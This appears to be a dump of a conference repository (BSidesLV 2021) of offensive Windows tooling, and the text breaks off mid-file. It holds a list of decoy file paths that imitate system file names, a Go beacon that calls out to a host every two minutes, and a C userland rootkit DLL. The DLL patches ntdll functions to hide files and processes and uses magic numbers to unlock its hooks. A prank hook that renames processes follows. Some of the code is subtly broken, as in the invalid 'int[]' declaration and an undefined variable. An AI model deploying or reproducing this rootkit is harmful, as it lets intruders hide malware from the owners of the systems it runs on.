C:\Windows\WinSxS\odbcrrac.dll 64 | C:\Windows\SysWOW64\wbem\SismCore.exe 65 | C:\Windows\System32\Sysprep\scsipori.dll 66 | C:\Windows\SysWOW64\downlevel\CntrtextInslaller.dll 67 | C:\Program Files\Internet Explorer\ws2helc.exe 68 | C:\Windows\System32\oobe\PresyntationCore.exe 69 | C:\Windows\SysWOW64\AdvancedInstallers\ssctfp.dll 70 | C:\Windows\System32\migwiz\msctkmig.exe 71 | C:\Windows\System32\Com\IMEPADEM.exe 72 | C:\Windows\System32\InkEr.dll 73 | C:\Windows\SysWOW64\en\prnlpcl4.dll 74 | C:\Program Files\Common Files\System\ado\upbus.dll 75 | C:\Windows\dhcpcmonntor.exe 76 | C:\Windows\SysWOW64\wbem\wuls.exe 77 | C:\Program Files\Common Files\System\ado\AwWinRT.exe 78 | C:\Windows\System32\wbem\frofapi.dll 79 | C:\Windows\System32\oobe\KBDCT.dll 80 | C:\Windows\SysWOW64\downlevel\CntrtextMic.exe 81 | C:\Windows\SysWOW64\Com\MiororDrvCompat.dll 82 | C:\Windows\System32\setup\mdminfft.exe 83 | C:\Windows\System32\migration\fsntsub.exe 84 | C:\Windows\apppatch\bootsts.dll 85 | C:\Windows\System32\AdvancedInstallers\KBDDO.dll 86 | C:\Windows\framsdynos.dll 87 | C:\Windows\SysWOW64\downlevel\KBDTT132.dll 88 | C:\Windows\System32\Sysprep\nuauclt.exe 89 | C:\Windows\System32\dot3fpui.dll 90 | C:\Windows\SysWOW64\migration\phflbmsg.exe 91 | C:\Windows\SysWOW64\downlevel\NlsLexicnns000d.dll 92 | C:\Windows\SysWOW64\Com\heframe.exe 93 | C:\Windows\System32\Boot\msdnm.dll 94 | C:\Program Files\Common Files\System\msadc\dcpromocmr.dll 95 | C:\Program Files\Internet Explorer\WofdpadFilter.dll 96 | C:\Program Files\Common Files\System\ado\MXHAgent.exe 97 | C:\Windows\SysWOW64\wbem\pnets.exe 98 | C:\Windows\mdmlis2u.exe 99 | C:\Program Files (x86)\Common Files\System\msadc\aiscore.exe 100 | C:\Windows\System32\systim.exe 101 | C:\Windows\SysWOW64\wbem\dmyskres2.dll 102 | C:\Program Files (x86)\Common Files\System\cposys.exe 103 | C:\Windows\SysWOW64\migration\dewiceaccess.exe 104 | C:\Windows\WinSxS\etorageutil.exe 105 | C:\Windows\SysWOW64\AdvancedInstallers\TNBJOP9S.dll 106 | C:\Windows\System32\WinSyncMetqstore.dll 107 | C:\Program Files\Common Files\System\ado\ipmiwrr.exe 108 | C:\Program Files (x86)\Common Files\System\msadc\KWDIT.dll 109 | C:\Windows\SysWOW64\en\rwinapi.exe 110 | C:\Windows\SysWOW64\migwiz\sspc.exe 111 | C:\Program Files (x86)\Common Files\System\msadc\hmiprop.dll 112 | C:\Windows\Microsoft.NET\mdmnis0u.exe 113 | C:\Program Files (x86)\Common Files\System\ado\ihwebsvc.exe 114 | C:\Windows\System32\imkomig.exe 115 | C:\Windows\System32\aormaliz.exe 116 | C:\Windows\SysWOW64\oobe\KBDXNMAL.exe 117 | C:\Windows\apppatch\yk63x24.dll 118 | C:\Windows\System32\Dism\mswtckrm.dll 119 | C:\Windows\SysWOW64\migwiz\luainsnall.dll 120 | C:\Program Files\Internet Explorer\cmigw.exe 121 | C:\Program Files (x86)\Common Files\System\msadc\wues2.exe 122 | C:\Windows\System32\downlevel\confect.dll 123 | C:\Windows\System32\qitsprx5.dll 124 | -------------------------------------------------------------------------------- /BSidesLV-2021/beacon.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "net" 5 | "os" 6 | "time" 7 | ) 8 | 9 | // beacon.go 10 | // Creates a beacon, duh. 11 | 12 | func main() { 13 | for { 14 | n, err := net.DialTimeout("tcp", ":", time.Second*5) 15 | if err != nil { 16 | println("err", err.Error()) 17 | return 18 | } 19 | n.Write([]byte("")) 20 | if n.Close(); len(os.Args) == 1 { 21 | break 22 | } 23 | time.Sleep(time.Minute * 2) 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /BSidesLV-2021/hooks/hook.c: -------------------------------------------------------------------------------- 1 | // Process/File Hook 2 | // Hides processes and files. 3 | // 4 | // Only tested on x64! 5 | 6 | // Windows Xp+ 7 | #define WINVER 0x0501 8 | #define _WIN32_WINNT 0x0501 9 | // Windows Vista+ 10 | // #define WINVER 0x0600 11 | // #define _WIN32_WINNT 0x0600 12 | 13 | #define NOCOMM 14 | #define WIN32_LEAN_AND_MEAN 15 | 16 | #include 17 | #include 18 | #include 19 | #include 20 | 21 | #define SIZE_JUMP 5 22 | #define SIZE_PATCH 19 23 | #define SIZE_IGNORE 7 24 | 25 | #define HOOK_LOCK 133701 26 | #define HOOK_UNLOCK 133702 27 | 28 | #define EXPORT __declspec(dllexport) 29 | 30 | typedef struct hook { 31 | HANDLE mutex; 32 | LPVOID target; 33 | unsigned char orig[SIZE_JUMP]; 34 | unsigned char patch[SIZE_JUMP]; 35 | } hook; 36 | typedef long long ptr; 37 | 38 | HANDLE mutexGlobal; 39 | 40 | // ** ADDED VIA SCRIPTS ** // 41 | #define KEY_SIZE 0 42 | #define LIST_SIZE 0 43 | #define EXEC_SIZE 0 44 | 45 | int[] dataSize = {}; 46 | 47 | // data is an array that contains a list of 48 | // strings. Files first, than processes. 49 | const char *data[] = {}; 50 | // ** END ** // 51 | 52 | // path in memory to jump to our code. 53 | unsigned char jump[SIZE_PATCH] = { 54 | 0x90, // nop 55 | 0x4C, 0x8B, 0xD0, // mv r10,rax 56 | 0x48, 0xB8, 0xA1, 0xA2, 0xA3, 0xA4, 0xA5, 0xA6, 0xA7, 0xA8, // mv rax, 57 | 0x50, // push rax 58 | 0x49, 0x8B, 0xC2, // mv rax,r10 59 | 0xC3, // ret 60 | }; 61 | 62 | // These procs do NOT handle hooks very well. 63 | // Let's avoid them crashing. 64 | const char *ignored[SIZE_IGNORE] = { 65 | "DLLHost.exe\0", 66 | "LogonUI.exe\0", 67 | "regedit.exe\0", 68 | "consent.exe\0", 69 | "rundll32.exe\0", 70 | "werfault.exe\0", 71 | "taskhostex.exe\0", 72 | }; 73 | 74 | // ** HOOKS ** 75 | hook QueryDir; 76 | hook OpenFileNT; 77 | hook ProcVersion; 78 | hook CreateFileNT; 79 | hook QuerySystemInfo; 80 | // ** END ** 81 | 82 | NTSYSCALLAPI NTSTATUS NTAPI NtQueryDirectoryFile( 83 | IN HANDLE FileHandle, 84 | IN HANDLE Event OPTIONAL, 85 | IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, 86 | IN PVOID ApcContext OPTIONAL, 87 | OUT PIO_STATUS_BLOCK IoStatusBlock, 88 | OUT PVOID FileInformation, 89 | IN ULONG Length, 90 | IN FILE_INFORMATION_CLASS FileInformationClass, 91 | IN BOOLEAN ReturnSingleEntry, 92 | IN PUNICODE_STRING FileName OPTIONAL, 93 | IN BOOLEAN RestartScan 94 | ); 95 | 96 | EXPORT DWORD WINAPI GetVersionFunc(DWORD); 97 | 98 | EXPORT NTSTATUS WINAPI QuerySystemInfoFunc(SYSTEM_INFORMATION_CLASS, PVOID, ULONG, PULONG); 99 | EXPORT NTSTATUS WINAPI OpenFileNTFunc(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, PIO_STATUS_BLOCK, ULONG, ULONG); 100 | EXPORT NTSTATUS WINAPI CreateFileNTFunc(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, PIO_STATUS_BLOCK, PLARGE_INTEGER, ULONG, ULONG, ULONG, ULONG, PVOID, ULONG); 101 | EXPORT NTSTATUS WINAPI QueryDirFunc(HANDLE, HANDLE, PIO_APC_ROUTINE, PVOID, PIO_STATUS_BLOCK, PVOID, ULONG, FILE_INFORMATION_CLASS, BOOLEAN, PUNICODE_STRING, BOOLEAN); 102 | 103 | // Find returns an empty memory space (INT3 or NOPS) in the specified module within a 32bit 104 | // address zone +/- of the pointer base. Returns 0 if the specified empty size cannot be found. 105 | ptr Find(int size, ptr module, ptr func) { 106 | SIZE_T n; 107 | int c = 0; 108 | unsigned char b[1024]; 109 | for (ptr x = module; x < func+65535; x += 1024) { 110 | if (ReadProcessMemory(GetCurrentProcess(), (LPVOID)x, b, 1024, &n) == 0) { 111 | return 0; 112 | } 113 | for (int i = 0; i < n; i++) { 114 | if (b[i] == 0x90 || b[i] == 0xCC) { 115 | if (c >= size+1) { 116 | return x+i-size; 117 | } 118 | c++; 119 | continue; 120 | } 121 | c = 0; 122 | } 123 | } 124 | return 0; 125 | } 126 | 127 | // Redo will reapply the JMP and unlock the hook mutex. 128 | void Redo(hook *h) { 129 | SIZE_T n; 130 | WriteProcessMemory(GetCurrentProcess(), h->target, h->patch, SIZE_JUMP, &n); 131 | ReleaseMutex(h->mutex); 132 | } 133 | // Undo will remove the hook JMP and will lock the hook mutex to prevent desync'd usage of the hook. 134 | void Undo(hook *h) { 135 | if (h->mutex == NULL || h->target == 0) { 136 | return; 137 | } 138 | WaitForSingleObject(h->mutex, INFINITE); 139 | SIZE_T n; 140 | WriteProcessMemory(GetCurrentProcess(), h->target, h->orig, SIZE_JUMP, &n); 141 | } 142 | // Hook will hook a function based on the provied handle, function pointer and replacement function. 143 | // The first argument is a pointer to a hook anchor. 144 | void Hook(hook *h, HANDLE mod, FARPROC func, ptr replacement) { 145 | if (mod == NULL || func == NULL || replacement == 0) { 146 | return; 147 | } 148 | ptr b = Find(SIZE_PATCH, (ptr)mod, (ptr)func); 149 | if (b == 0) { 150 | return; 151 | } 152 | SIZE_T n; 153 | h->target = (LPVOID)func; 154 | DWORD p; 155 | VirtualProtect(h->target, SIZE_JUMP, PAGE_EXECUTE_READWRITE, &p); 156 | if (ReadProcessMemory(GetCurrentProcess(), h->target, h->orig, SIZE_JUMP, &n) == 0 || n != SIZE_JUMP) { 157 | return; 158 | } 159 | if (h->orig[0] == 0xE9) { 160 | // Already hooked? 161 | h->target = 0; 162 | return; 163 | } 164 | WaitForSingleObject(mutexGlobal, INFINITE); 165 | jump[13] = (replacement >> 56) & 0xFF; 166 | jump[12] = (replacement >> 48) & 0xFF; 167 | jump[11] = (replacement >> 40) & 0xFF; 168 | jump[10] = (replacement >> 32) & 0xFF; 169 | jump[9] = (replacement >> 24) & 0xFF; 170 | jump[8] = (replacement >> 16) & 0xFF; 171 | jump[7] = (replacement >> 8) & 0xFF; 172 | jump[6] = replacement & 0xFF; 173 | VirtualProtect((LPVOID)b, SIZE_PATCH, PAGE_EXECUTE_READWRITE, &p); 174 | if (WriteProcessMemory(GetCurrentProcess(), (LPVOID)b, jump, SIZE_PATCH, &n) == 0 || n != SIZE_PATCH) { 175 | ReleaseMutex(mutexGlobal); 176 | return; 177 | } 178 | ptr d = (b - 4) - (ptr)func; 179 | h->patch[4] = (d >> 24) & 0xFF; 180 | h->patch[3] = (d >> 16) & 0xFF; 181 | h->patch[2] = (d >> 8) & 0xFF; 182 | h->patch[1] = d & 0xFF; 183 | h->patch[0] = 0xE9; 184 | DWORD r = WriteProcessMemory(GetCurrentProcess(), h->target, h->patch, SIZE_JUMP, &n); 185 | ReleaseMutex(mutexGlobal); 186 | if (r == 0 || n != SIZE_JUMP) { 187 | return; 188 | } 189 | h->mutex = CreateMutex(NULL, FALSE, NULL); 190 | } 191 | 192 | #ifdef XOR 193 | // Xor can be used to decrypt the names contained 194 | void Xor(unsigned char* key, int key_size, unsigned char* data, int data_size) { 195 | if (key_size <= 0 || data_size <= 0) { 196 | return; 197 | } 198 | DWORD o; 199 | VirtualProtect(data, data_size+1, PAGE_READWRITE, &o); 200 | for (int i = 0; i < data_size; i++) { 201 | data[i] = data[i] ^ key[i % key_size]; 202 | } 203 | VirtualProtect(data, data_size+1, PAGE_READONLY, &o); 204 | } 205 | #endif 206 | 207 | int IndexOf(WCHAR *src, int src_len, const char *find, int find_len) { 208 | if (find_len > src_len) { 209 | return -1; 210 | } 211 | int f = find_len - 1, t = find_len - 1; 212 | for (int x = src_len - 1; x >= 0; x--) { 213 | if (src[x] == 0) { 214 | continue; 215 | } 216 | if (src[x] == find[f]) { 217 | f--; 218 | } else if (src[x] > 96 && find[f]+32 == src[x]) { 219 | f--; 220 | } else if (find[f] > 96 && src[x]+32 == find[f]) { 221 | f--; 222 | } else { 223 | if (f < t) { 224 | x++; 225 | } 226 | f = t; 227 | } 228 | if (f < 0) { 229 | return src_len-(src_len-x); 230 | } 231 | if (f == t && x < find_len) { 232 | return -1; 233 | } 234 | } 235 | return -1; 236 | } 237 | 238 | BOOL Ignore(WCHAR *src, int src_len) { 239 | for (int i = 0; i < SIZE_IGNORE; i++) { 240 | if (IndexOf(src, src_len, ignored[i], strlen(ignored[i])) != -1) { 241 | return TRUE; 242 | } 243 | } 244 | return FALSE; 245 | } 246 | BOOL HideFile(WCHAR *src, int src_len) { 247 | for (int i = EXEC_SIZE; i < LIST_SIZE; i++) { 248 | if (IndexOf(src, src_len, data[i], dataSize[i]) != -1) { 249 | return TRUE; 250 | } 251 | } 252 | return FALSE; 253 | } 254 | BOOL HideProcess(WCHAR *src, int src_len) { 255 | if (src_len == 0) { 256 | return FALSE; 257 | } 258 | for (int i = 0; i < EXEC_SIZE; i++) { 259 | if (IndexOf(src, src_len, data[i], dataSize[i]) != -1) { 260 | return TRUE; 261 | } 262 | } 263 | return FALSE; 264 | } 265 | 266 | EXPORT BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID args) { 267 | if (r == DLL_PROCESS_ATTACH) { 268 | // Check the file name to see if we should bail out. 269 | // Don't dynamically allocate this. It breaks things. 270 | WCHAR s[256]; 271 | int n = GetModuleFileNameW(NULL, (LPWSTR)s, MAX_PATH); 272 | if (n > 0 && Ignore(s, n)) { 273 | return TRUE; 274 | } 275 | HANDLE a = LoadLibraryW(L"ntdll.dll"); 276 | HANDLE b = LoadLibraryW(L"kernel32.dll"); 277 | // Hide Files 278 | Hook(&OpenFileNT, a, GetProcAddress(a, "NtOpenFile"), (ptr)&OpenFileNTFunc); 279 | Hook(&CreateFileNT, a, GetProcAddress(a, "NtCreateFile"), (ptr)&CreateFileNTFunc); 280 | // Unhook 281 | Hook(&ProcVersion, b, GetProcAddress(b, "GetProcessVersion"), (ptr)&GetVersionFunc); 282 | #ifdef XOR 283 | for (int i = 0; i < LIST_SIZE; i++) { 284 | Xor(data, KEY_SIZE, data[i], dataSize[i]); 285 | } 286 | #endif 287 | // Avoid Explorer, as it doesn't like the last two. 288 | if (n > 0 && IndexOf(s, n, "explorer.exe\0", 12) == -1) { 289 | return TRUE; 290 | } 291 | // Avoid Task Manager as it causes problems. 292 | if (n > 0 && IndexOf(s, n, "taskmgr.exe\0", 11) == -1) { 293 | Hook(&QueryDir, a, GetProcAddress(a, "NtQueryDirectoryFile"), (ptr)&QueryDirFunc); 294 | } 295 | // Hide Processes 296 | Hook(&QuerySystemInfo, a, GetProcAddress(a, "NtQuerySystemInformation"), (ptr)&QuerySystemInfoFunc); 297 | } else if (r == DLL_PROCESS_DETACH) { 298 | Undo(&QueryDir); 299 | Undo(&OpenFileNT); 300 | Undo(&ProcVersion); 301 | Undo(&CreateFileNT); 302 | Undo(&QuerySystemInfo); 303 | } 304 | return TRUE; 305 | } 306 | 307 | EXPORT DWORD WINAPI GetVersionFunc(DWORD pid) { 308 | // Do we have the special number? Unlock hooks. 309 | if (pid == HOOK_UNLOCK) { 310 | Undo(&QueryDir); 311 | Undo(&OpenFileNT); 312 | Undo(&CreateFileNT); 313 | Undo(&QuerySystemInfo); 314 | return 0; 315 | } 316 | // Do we have the special number? Re-lock hooks. 317 | if (pid == HOOK_LOCK) { 318 | Redo(&QueryDir); 319 | Redo(&OpenFileNT); 320 | Redo(&CreateFileNT); 321 | Redo(&QuerySystemInfo); 322 | return 0; 323 | } 324 | // Standard operations. 325 | Undo(&ProcVersion); 326 | DWORD r = GetProcessVersion(pid); 327 | Redo(&ProcVersion); 328 | return r; 329 | } 330 | 331 | EXPORT NTSTATUS WINAPI QuerySystemInfoFunc(SYSTEM_INFORMATION_CLASS class, PVOID info, ULONG size, PULONG ret) { 332 | Undo(&QuerySystemInfo); 333 | NTSTATUS r = NtQuerySystemInformation(class, info, size, ret); 334 | Redo(&QuerySystemInfo); 335 | // Ignore errors or things we don't care about. 336 | if (size == 0 || r != 0x00000000 || class != SystemProcessInformation) { 337 | return r; 338 | } 339 | PSYSTEM_PROCESS_INFORMATION n = (PSYSTEM_PROCESS_INFORMATION)info; 340 | if (n->NextEntryOffset == 0) { 341 | return r; 342 | } 343 | DWORD p = GetCurrentProcessId(); 344 | PSYSTEM_PROCESS_INFORMATION c = NULL; 345 | while (n->NextEntryOffset != 0) { 346 | c = (PSYSTEM_PROCESS_INFORMATION)((PUCHAR)n+n->NextEntryOffset); 347 | // Do not hide processes if it's the calling PID. 348 | // Causes powershell to crash. 349 | if ((DWORD)(c->UniqueProcessId) == p || !HideProcess(c->ImageName.Buffer, c->ImageName.Length)) { 350 | n = c; 351 | continue; 352 | } 353 | // Skip process. 354 | if (c->NextEntryOffset == 0) { 355 | n->NextEntryOffset = 0; 356 | } 357 | n->NextEntryOffset += c->NextEntryOffset; 358 | } 359 | return r; 360 | } 361 | EXPORT NTSTATUS WINAPI OpenFileNTFunc(PHANDLE hdl, ACCESS_MASK da, POBJECT_ATTRIBUTES oa, PIO_STATUS_BLOCK isb, ULONG sa, ULONG oo) { 362 | // If we hide it, return ACCESS_DENIED. 363 | if (HideFile(oa->ObjectName->Buffer, oa->ObjectName->Length)) { 364 | return 0xC000000F; 365 | } 366 | Undo(&OpenFileNT); 367 | NTSTATUS r = NtOpenFile(hdl, da, oa, isb, sa, oo); 368 | Redo(&OpenFileNT); 369 | return r; 370 | } 371 | EXPORT NTSTATUS WINAPI CreateFileNTFunc(PHANDLE hdl, ACCESS_MASK da, POBJECT_ATTRIBUTES oa, PIO_STATUS_BLOCK isb, PLARGE_INTEGER as, ULONG fa, ULONG sa, ULONG cd, ULONG co, PVOID eab, ULONG eas) { 372 | // If we hide it, return ACCESS_DENIED. 373 | if (HideFile(oa->ObjectName->Buffer, oa->ObjectName->Length)) { 374 | return 0xC000000F; 375 | } 376 | Undo(&CreateFileNT); 377 | NTSTATUS r = NtCreateFile(hdl, da, oa, isb, as, fa, sa, cd, co, eab, eas); 378 | Redo(&CreateFileNT); 379 | return r; 380 | } 381 | EXPORT NTSTATUS WINAPI QueryDirFunc(HANDLE hdl, HANDLE e, PIO_APC_ROUTINE apcr, PVOID apcc, PIO_STATUS_BLOCK isb, PVOID info, ULONG size, FILE_INFORMATION_CLASS class, BOOLEAN rse, PUNICODE_STRING fn, BOOLEAN rs) { 382 | Undo(&QueryDir); 383 | NTSTATUS r = NtQueryDirectoryFile(hdl, e, apcr, apcc, isb, info, size, class, rse, fn, rs); 384 | Redo(&QueryDir); 385 | // Ignore errors or things we don't care about. 386 | if (size == 0 || (r != 0x00000000 && r != 0x80000006)) { 387 | return r; 388 | } 389 | if (class == FileDirectoryInformation) { 390 | PFILE_DIRECTORY_INFORMATION n = (PFILE_DIRECTORY_INFORMATION)info; 391 | if (n->NextEntryOffset == 0) { 392 | return r; 393 | } 394 | // Single File, return ACCESS_DENIED 395 | if (isb->Information == 0 && HideFile(n->FileName, n->FileNameLength)) { 396 | return 0xC000000F; 397 | } 398 | PFILE_DIRECTORY_INFORMATION c = NULL; 399 | while (n->NextEntryOffset != 0) { 400 | c = (PFILE_DIRECTORY_INFORMATION)((PUCHAR)n+n->NextEntryOffset); 401 | if (!HideFile(c->FileName, c->FileNameLength)) { 402 | n = c; 403 | continue; 404 | } 405 | // Skip file. 406 | if (c->NextEntryOffset == 0) { 407 | n->NextEntryOffset = 0; 408 | } 409 | n->NextEntryOffset += c->NextEntryOffset; 410 | } 411 | } 412 | if (class == FileFullDirectoryInformation) { 413 | PFILE_FULL_DIR_INFORMATION n = (PFILE_FULL_DIR_INFORMATION)info; 414 | if (n->NextEntryOffset == 0) { 415 | return r; 416 | } 417 | // Single File, return ACCESS_DENIED 418 | if (isb->Information == 0 && HideFile(n->FileName, n->FileNameLength)) { 419 | return 0xC000000F; 420 | } 421 | PFILE_FULL_DIR_INFORMATION c = NULL; 422 | while (isb->Information != 0 && n->NextEntryOffset != 0) { 423 | c = (PFILE_FULL_DIR_INFORMATION)((PUCHAR)n+n->NextEntryOffset); 424 | if (!HideFile(c->FileName, c->FileNameLength)) { 425 | n = c; 426 | continue; 427 | } 428 | // Skip file. 429 | if (c->NextEntryOffset == 0) { 430 | n->NextEntryOffset = 0; 431 | } 432 | n->NextEntryOffset += c->NextEntryOffset; 433 | } 434 | } 435 | if (class == FileBothDirectoryInformation) { 436 | PFILE_BOTH_DIR_INFORMATION n = (PFILE_BOTH_DIR_INFORMATION)info; 437 | if (n->NextEntryOffset == 0) { 438 | return r; 439 | } 440 | // Single File, return ACCESS_DENIED 441 | if (isb->Information == 0 && HideFile(n->FileName, n->FileNameLength)) { 442 | return 0xC000000F; 443 | } 444 | PFILE_BOTH_DIR_INFORMATION c = NULL; 445 | while (n->NextEntryOffset != 0) { 446 | c = (PFILE_BOTH_DIR_INFORMATION)((PUCHAR)n+n->NextEntryOffset); 447 | if (!HideFile(c->FileName, c->FileNameLength)) { 448 | n = c; 449 | continue; 450 | } 451 | // Skip file. 452 | if (c->NextEntryOffset == 0) { 453 | n->NextEntryOffset = 0; 454 | } 455 | n->NextEntryOffset += c->NextEntryOffset; 456 | } 457 | } 458 | return r; 459 | } 460 | -------------------------------------------------------------------------------- /BSidesLV-2021/hooks/hook_rickroll.c: -------------------------------------------------------------------------------- 1 | // RickRoll Hook 2 | // Renames all processes to your favorite song. 3 | // 4 | // Only tested on x64! 5 | 6 | #define WINVER 0x0501 7 | #define _WIN32_WINNT 0x0501 8 | 9 | #define NOCOMM 10 | #define WIN32_LEAN_AND_MEAN 11 | 12 | #include 13 | #include 14 | #include 15 | #include 16 | 17 | #define SIZE_JUMP 5 18 | #define SIZE_PATCH 19 19 | #define SIZE_IGNORE 7 20 | #define SIZE_LYRICS 34 21 | 22 | #define EXPORT __declspec(dllexport) 23 | 24 | typedef struct hook { 25 | HANDLE mutex; 26 | LPVOID target; 27 | unsigned char orig[SIZE_JUMP]; 28 | unsigned char patch[SIZE_JUMP]; 29 | } hook; 30 | typedef long long ptr; 31 | 32 | HANDLE mutexGlobal; 33 | 34 | // path in memory to jump to our code. 35 | unsigned char jump[SIZE_PATCH] = { 36 | 0x90, // nop 37 | 0x4C, 0x8B, 0xD0, // mv r10,rax 38 | 0x48, 0xB8, 0xA1, 0xA2, 0xA3, 0xA4, 0xA5, 0xA6, 0xA7, 0xA8, // mv rax, 39 | 0x50, // push rax 40 | 0x49, 0x8B, 0xC2, // mv rax,r10 41 | 0xC3, // ret 42 | }; 43 | 44 | // These procs do NOT handle hooks very well. 45 | // Let's avoid them crashing. 46 | const char *ignored[SIZE_IGNORE] = { 47 | "DLLHost.exe\0", 48 | "LogonUI.exe\0", 49 | "regedit.exe\0", 50 | "consent.exe\0", 51 | "rundll32.exe\0", 52 | "werfault.exe\0", 53 | "taskhostex.exe\0" 54 | }; 55 | 56 | const wchar_t *lyrics[SIZE_LYRICS] = { 57 | L"Never ", L"gonna ", L"give ", L"you ", L"up ", 58 | L"Never ", L"gonna ", L"let ", L"you ", L"down ", 59 | L"Never ", L"gonna ", L"run ", L"around ", L"and ", L"desert ", L"you ", 60 | L"Never ", L"gonna ", L"make ", L"you ", L"cry ", 61 | L"Never ", L"gonna ", L"say ", L"goodbye ", 62 | L"Never ", L"gonna ", L"tell ", L"a ", L"lie ", L"and ", L"hurt ", L"you " 63 | }; 64 | 65 | // ** HOOKS ** 66 | hook QuerySystemInfo; 67 | // ** END ** 68 | 69 | EXPORT NTSTATUS WINAPI QuerySystemInfoFunc(SYSTEM_INFORMATION_CLASS, PVOID, ULONG, PULONG); 70 | 71 | // Find returns an empty memory space (INT3 or NOPS) in the specified module within a 32bit 72 | // address zone +/- of the pointer base. Returns 0 if the specified empty size cannot be found. 73 | ptr Find(int size, ptr module, ptr func) { 74 | SIZE_T n; 75 | int c = 0; 76 | unsigned char b[1024]; 77 | for (ptr x = module; x < func+65535; x += 1024) { 78 | if (ReadProcessMemory(GetCurrentProcess(), (LPVOID)x, b, 1024, &n) == 0) { 79 | return 0; 80 | } 81 | for (int i = 0; i < n; i++) { 82 | if (b[i] == 0x90 || b[i] == 0xCC) { 83 | if (c >= size+1) { 84 | return x+i-size; 85 | } 86 | c++; 87 | continue; 88 | } 89 | c = 0; 90 | } 91 | } 92 | return 0; 93 | } 94 | 95 | // Redo will reapply the JMP and unlock the hook mutex. 96 | void Redo(hook *h) { 97 | SIZE_T n; 98 | WriteProcessMemory(GetCurrentProcess(), h->target, h->patch, SIZE_JUMP, &n); 99 | ReleaseMutex(h->mutex); 100 | } 101 | // Undo will remove the hook JMP and will lock the hook mutex to prevent desync'd usage of the hook. 102 | void Undo(hook *h) { 103 | if (h->mutex == NULL || h->target == 0) { 104 | return; 105 | } 106 | WaitForSingleObject(h->mutex, INFINITE); 107 | SIZE_T n; 108 | WriteProcessMemory(GetCurrentProcess(), h->target, h->orig, SIZE_JUMP, &n); 109 | } 110 | // Hook will hook a function based on the provied handle, function pointer and replacement function. 111 | // The first argument is a pointer to a hook anchor. 112 | void Hook(hook *h, HANDLE mod, FARPROC func, ptr replacement) { 113 | if (mod == NULL || func == NULL || replacement == 0) { 114 | return; 115 | } 116 | ptr b = Find(SIZE_PATCH, (ptr)mod, (ptr)func); 117 | if (b == 0) { 118 | return; 119 | } 120 | SIZE_T n; 121 | h->target = (LPVOID)func; 122 | DWORD p; 123 | VirtualProtect(h->target, SIZE_JUMP, PAGE_EXECUTE_READWRITE, &p); 124 | if (ReadProcessMemory(GetCurrentProcess(), h->target, h->orig, SIZE_JUMP, &n) == 0 || n != SIZE_JUMP) { 125 | return; 126 | } 127 | if (h->orig[0] == 0xE9) { 128 | // Already hooked? 129 | h->target = 0; 130 | return; 131 | } 132 | WaitForSingleObject(mutexGlobal, INFINITE); 133 | jump[13] = (replacement >> 56) & 0xFF; 134 | jump[12] = (replacement >> 48) & 0xFF; 135 | jump[11] = (replacement >> 40) & 0xFF; 136 | jump[10] = (replacement >> 32) & 0xFF; 137 | jump[9] = (replacement >> 24) & 0xFF; 138 | jump[8] = (replacement >> 16) & 0xFF; 139 | jump[7] = (replacement >> 8) & 0xFF; 140 | jump[6] = replacement & 0xFF; 141 | VirtualProtect((LPVOID)b, SIZE_PATCH, PAGE_EXECUTE_READWRITE, &p); 142 | if (WriteProcessMemory(GetCurrentProcess(), (LPVOID)b, jump, SIZE_PATCH, &n) == 0 || n != SIZE_PATCH) { 143 | ReleaseMutex(mutexGlobal); 144 | return; 145 | } 146 | ptr d = (b - 4) - (ptr)func; 147 | h->patch[4] = (d >> 24) & 0xFF; 148 | h->patch[3] = (d >> 16) & 0xFF; 149 | h->patch[2] = (d >> 8) & 0xFF; 150 | h->patch[1] = d & 0xFF; 151 | h->patch[0] = 0xE9; 152 | DWORD r = WriteProcessMemory(GetCurrentProcess(), h->target, h->patch, SIZE_JUMP, &n); 153 | ReleaseMutex(mutexGlobal); 154 | if (r == 0 || n != SIZE_JUMP) { 155 | return; 156 | } 157 | h->mutex = CreateMutex(NULL, FALSE, NULL); 158 | } 159 | 160 | int IndexOf(WCHAR *src, int src_len, const char *find, int find_len) { 161 | if (find_len > src_len) { 162 | return -1; 163 | } 164 | int f = find_len - 1, t = find_len - 1; 165 | for (int x = src_len - 1; x >= 0; x--) { 166 | if (src[x] == 0) { 167 | continue; 168 | } 169 | if (src[x] == find[f]) { 170 | f--; 171 | } else if (src[x] > 96 && find[f]+32 == src[x]) { 172 | f--; 173 | } else if (find[f] > 96 && src[x]+32 == find[f]) { 174 | f--; 175 | } else { 176 | if (f < t) { 177 | x++; 178 | } 179 | f = t; 180 | } 181 | if (f < 0) { 182 | return src_len-(src_len-x); 183 | } 184 | if (f == t && x < find_len) { 185 | return -1; 186 | } 187 | } 188 | return -1; 189 | } 190 | 191 | BOOL Ignore(WCHAR *src, int src_len) { 192 | for (int i = 0; i < SIZE_IGNORE; i++) { 193 | if (IndexOf(src, src_len, ignored[i], strlen(ignored[i])) != -1) { 194 | return TRUE; 195 | } 196 | } 197 | return FALSE; 198 | } 199 | 200 | EXPORT BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID args) { 201 | if (r == DLL_PROCESS_ATTACH) { 202 | // Check the file name to see if we should bail out. 203 | // Don't dynamically allocate this. It breaks things. 204 | WCHAR s[256]; 205 | int n = GetModuleFileNameW(NULL, (LPWSTR)s, MAX_PATH); 206 | if (n > 0 && Ignore(s, n)) { 207 | return TRUE; 208 | } 209 | Hook(&QuerySystemInfo, LoadLibraryW(L"ntdll.dll"), GetProcAddress(a, "NtQuerySystemInformation"), (ptr)&QuerySystemInfoFunc); 210 | } else if (r == DLL_PROCESS_DETACH) { 211 | Undo(&QuerySystemInfo); 212 | } 213 | return TRUE; 214 | } 215 | 216 | EXPORT NTSTATUS WINAPI QuerySystemInfoFunc(SYSTEM_INFORMATION_CLASS class, PVOID info, ULONG size, PULONG ret) { 217 | Undo(&QuerySystemInfo); 218 | NTSTATUS r = NtQuerySystemInformation(class, info, size, ret); 219 | Redo(&QuerySystemInfo); 220 | // Ignore errors or things we don't care about. 221 | if (size == 0 || r != 0x00000000 || class != SystemProcessInformation) { 222 | return r; 223 | } 224 | PSYSTEM_PROCESS_INFORMATION n = (PSYSTEM_PROCESS_INFORMATION)info; 225 | if (n->NextEntryOffset == 0) { 226 | return r; 227 | } 228 | int d = 0; 229 | PSYSTEM_PROCESS_INFORMATION c = NULL; 230 | while (n->NextEntryOffset != 0) { 231 | c = 